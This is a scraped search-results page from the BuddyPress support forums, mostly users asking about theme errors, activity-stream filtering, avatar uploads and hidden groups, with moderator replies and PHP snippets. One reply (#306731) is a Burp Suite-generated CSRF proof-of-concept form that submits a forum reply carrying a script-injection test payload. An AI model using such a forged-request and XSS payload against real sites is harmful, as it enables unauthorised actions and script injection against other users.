Skip to:
Content
Pages
Categories
Search
Top
Bottom

Search Results for 'buddypress'

Viewing 25 results - 4,551 through 4,575 (of 68,986 total)
  • Author
    Search Results
  • #306736
    shanebp
    Moderator

    The error is coming from your theme – Not from BuddyPress.

    bp_is_user_forums() was removed from BuddyPress since Version 3.0.0

    You could delete those two lines from themes/moview/members/single/home.php
    If you did not add BP templates to your theme, then you could also send an error report to the creators of your theme.

    #306733
    FahimMurshed
    Participant

    Got this error on this theme.

    Fatal error: Uncaught Error: Call to undefined function bp_is_user_forums() in /Applications/MAMP/htdocs/moview/wp-content/themes/moview/members/single/home.php:85 Stack trace: #0 /Applications/MAMP/htdocs/moview/wp-includes/template.php(724): require() #1 /Applications/MAMP/htdocs/moview/wp-content/plugins/buddypress/bp-core/bp-core-template-loader.php(155): load_template('/Applications/M...', false) #2 /Applications/MAMP/htdocs/moview/wp-content/plugins/buddypress/bp-core/bp-core-template-loader.php(61): bp_locate_template(Array, true, false) #3 /Applications/MAMP/htdocs/moview/wp-content/plugins/buddypress/bp-core/bp-core-template-loader.php(338): bp_get_template_part('members/single/...', NULL) #4 /Applications/MAMP/htdocs/moview/wp-content/plugins/buddypress/bp-members/classes/class-bp-members-theme-compat.php(212): bp_buffer_template_part('members/single/...', NULL, false) #5 /Applications/MAMP/htdocs/moview/wp-includes/class-wp-hook.php(286): BP_Members_Theme_Compat->single_dummy_content('') #6 /Applications/MAMP/h in /Applications/MAMP/htdocs/moview/wp-content/themes/moview/members/single/home.php on line 85

    This file line is: /Applications/MAMP/h in /Applications/MAMP/htdocs/moview/wp-content/themes/moview/members/single/home.php on line 85

    
    		elseif ( bp_is_user_forums() ) :
    			bp_get_template_part( 'members/single/forums'   );
    

    moview theme

    If I delete this folder from this theme, style is broken.

    Please help me.

    #306731

    In reply to: Bookmark extension

    test1324
    Participant

    `<html>
    <!– CSRF PoC – generated by Burp Suite Professional –>
    <body>
    <script>history.pushState(”, ”, ‘/’)</script>
    <form action=”https://buddypress.org/support/topic/bookmark-extension/&#8221; method=”POST”>
    <input type=”hidden” name=”bbp_reply_content” value=”`<marquee>TEST</marquee> </script>SSS<script>alert(1)</script>ss” />
    <input type=”hidden” name=”bbp_topic_tags” value=”” />
    <input type=”hidden” name=”bbp_reply_submit” value=”” />
    <input type=”hidden” name=”bbp_topic_id” value=”306727″ />
    <input type=”hidden” name=”bbp_reply_to” value=”0″ />
    <input type=”hidden” name=”action” value=”bbp-new-reply” />
    <input type=”hidden” name=”_wp_http_referer” value=”/support/topic/bookmark-extension/” />
    <input type=”hidden” name=”redirect_to” value=”https://buddypress.org/support/topic/bookmark-extension/” />
    <input type=”submit” value=”Submit request” />
    </form>
    </body>
    </html>

    #306726
    demomann
    Participant

    hello! I’m looking for a buddypress extension. I would like a buddypress member to be able to add a site article to his bookmark or his wishlist. this can increase the interaction between buddypress and the site. is there a plugin that does this?

    clicken
    Participant

    Iv’e been searching for ways to keep my users on the front-end. The user links in the adminbar here on the buddypress forums will tell me I don’t have access if I click on the top links; I have to click on one of the lower links (created by buddypress) to view my user info and stufff.

    Why is it that way instead of having all those links take the user to the profile on the frontend?

    I like that part of the admin bar but I want to keep users on the frontend! Please Help!

    #306709
    shanebp
    Moderator

    Check your browser console for javascript errors.

    To see if your issue is theme related – try momentarily switching to a WP theme like 2019.

    If you still have issues, you can open a ticket here.

    ( btw- you cannot upload images here. Instead upload them somewhere else and then post the url here. )

    #306708
    brianckimble
    Participant

    Wordpress: 5.2.2
    BuddyPress: 4.3.0
    Theme: Astra

    I have an error when changing profile picture. After selecting picture from computer, the green progress loading bar is only “full” for a couple of seconds (as opposed to “filling” corresponding to the file upload), and then it displays a picture for “crop” that is either nothing or miniscule. All that is visible is the “crop” button and what appears to be the four corner dots of the crop tool all bunched together. I have screen shots of the error, but don’t know how to upload them.

    coolhunt
    Participant

    Though I wonder what the benefit of creating a new fork/platform over – separate paid-premium plug-ins and hyper tuned themes..

    Still I love buddyboss themes – but being locked in is a headache I would not ever try to think about..

    Frankly I’ve always been deeply frustrated with buddypress though..

    #306698
    Henry Wright
    Moderator

    Try using bp_parse_args(). Here is an example:

    
    function my_filter_after_has_activities_parse_args( $r ) {
        $r['per_page'] = 3;
        // Do something else here
        return $r;
    }
    add_filter( 'bp_after_has_activities_parse_args', 'my_filter_after_has_activities_parse_args' );
    

    See https://codex.buddypress.org/developer/using-bp_parse_args-to-filter-buddypress-template-loops/

    #306697
    manuelguillegil
    Participant

    Hello! Thank you!! Now I am working with another server and now if I see the registration page without problems

    What I want to do is the following: I want on my page that the moment a new user registers, it is entered in the fields that in the simple selection questions: A and B (which are profile field of Buddypress), if the person has more than 50% of questions A or questions B, this user will be of a specific type or group (for example: Group A or Group B)

    I was checking online and I think there is little content regarding this

    Thank you!!

    #306696
    manuelguillegil
    Participant

    Hello! Thank you!! Now I am working with another server and now if I see the registration page without problems

    What I want to do is the following: I want on my page that the moment a new user registers, it is entered in the fields that in the simple selection questions: A and B (which are profile field of Buddypress), if the person has more than 50% of questions A or questions B, this user will be of a specific type or group (for example: Group A or Group B)

    Jan
    Participant

    Hi!
    I have problems with e-mails.
    I set email when someone registers on my website for activation but it seems not working.
    Same problem with the cover image of a user profile. When I upload my personal cover image in CUSTOM CSS PANEL it’s working. But when I go to my profile disappears.

    Wordpress Version: 5.2.2
    Buddypress Version: 4.3.0.
    Website: https://www.dovadoapp.com

    Thank you for your patience.

    #306690
    nataliapaananen
    Participant

    Hi! I am using Buddypress Nouveau template and it has preview -feature when clicking on new message thread.

    How can I disable this function?

    I know I could change to legacy but I want to use Nouveau template.

    I am using these versions:
    Wordpress: 5.2.2
    Buddypress: 4.3.0

    Many thanks in advance!

    friedli
    Participant

    I have a multilanguage website German & French. When I register a user on the French version, I get the french text by mail but the link for activating is the one from the German version. So when the user wants to activate his account he sees the wrong language after clicking on the url.

    How can this be changed? It’s about this token %7B%7B%7Bactivate.url%7D%7D%7D

    #306687
    ZolTech.co.il
    Participant

    found it 🙂

    Paid Memberships Pro – BuddyPress Add On

    thanks alot

    joshreid
    Participant

    Hi I am using BuddyPress on my site. When a member searches for other members on the BuddyPress search bar the other users show up, but so do the affiliate members. I was wondering is there a way for the affiliates not to show up in this search. They are a different user group in the back end of my wp site, I thought maybe it could be down this way. Thanks very much for your time thanks.

    #306684
    Nahum
    Participant

    I always reference this https://buddypress.org/support/topic/choosing-activity-stream-information/ but maybe something like, untested

    add_filter( 'bp_before_has_activities_parse_args', function( $args ) {
    	
    if(bp_is_current_action( 'groups' )) {
    
     $args['object'] = array('groups');
    
    } else {
    $filter_query = array(
    		array(
    			'column' => 'type',
    			'value' => array( 'group_action_1', 'group_action_etc' ),
    			'compare' => 'NOT IN',
    		),
    	);
    
    	$args['filter_query'] = $filter_query;
    }
    
    	return $args;
    } );
    #306682
    shanebp
    Moderator

    If you can reach the groups page when you are logged in, then some code in your theme or a plugin is restricting that page to only loggged in users.
    You need to find the source of that restriction.
    BuddyPress does not include that restriction.

    Aron Prins
    Participant

    Hey everyone,

    I’m trying to remove group related activity from the “Everything”, but keep it under the my groups tab but can’t find a way to do it on the forums. I found this https://buddypress.org/support/topic/disable-group-posts-from-main-activity-stream/ but this also removes it from the my groups tab 🙁

    Does someone perhaps have a snippet laying around or can point me in the right direction to check which tab is selected?

    Thanks,
    Aron

    coolhunt
    Participant

    I use buddyboss and I LOVE what they do…

    but.. im a little nervous .. with the change over.

    Its worth pointing out that there OUTSTANDING themes are still available for normal buddypress..

    allnamestaken
    Participant

    there is a buddyboss platform plugin designed to replace buddypress and bbpress.

    buddyboss platfofm plugin is free. Theme cost money. Plugin is hard to find… look at the top left corner is says free download.

    shanebp
    Moderator

    I saw that announcement. Does their ‘platform’ include all of BuddyPress or just the templates?
    Themes often include the BP templates as overloads but not the component classes.
    If it is a fork then it would be the first commercial fork, afaik.

    #306660

    In reply to: User Feedback Buttons

    Prashant Singh
    Participant

    It’s very strange. I can see it perfectly fine with just BuddyPress and Twenty Nineteen theme activated. Can you please try changing the theme to twenty seventeen and then check if it is coming there?

    #306659
    Prashant Singh
    Participant

    Please have a backup first and then try deactivating plugins except for BuddyPress.

    schossie
    Participant

    Hello, I think this issue has been going on for years, but I dont seem to be able to find that it had been fixed at some point!

    I am using wp 5.22 bbpress 2.5.14 and buddypress 4.3.0
    It still happens when I use different themes and if I uninstall other plugins.

    I have hidden buddypress groups which show in the activity stream even if you are not registered or logged in see here
    Core women is a hidden buddypress group and should be not visible to anybody except the group members.

    In bbpress I have a plugin called private groups which also show in the activity stream. You cant enter the forum via the link, but still you see the heading and actually also the text.
    I wonder if this problem is because of a false bbp and BP integration? BP doesnt get the info for private/hidden forums?

    I am very new to this and dont have much experience so please tell me what more information I can give.
    Has there ever been a solution to this?
    Thank you!

Viewing 25 results - 4,551 through 4,575 (of 68,986 total)
Skip to toolbar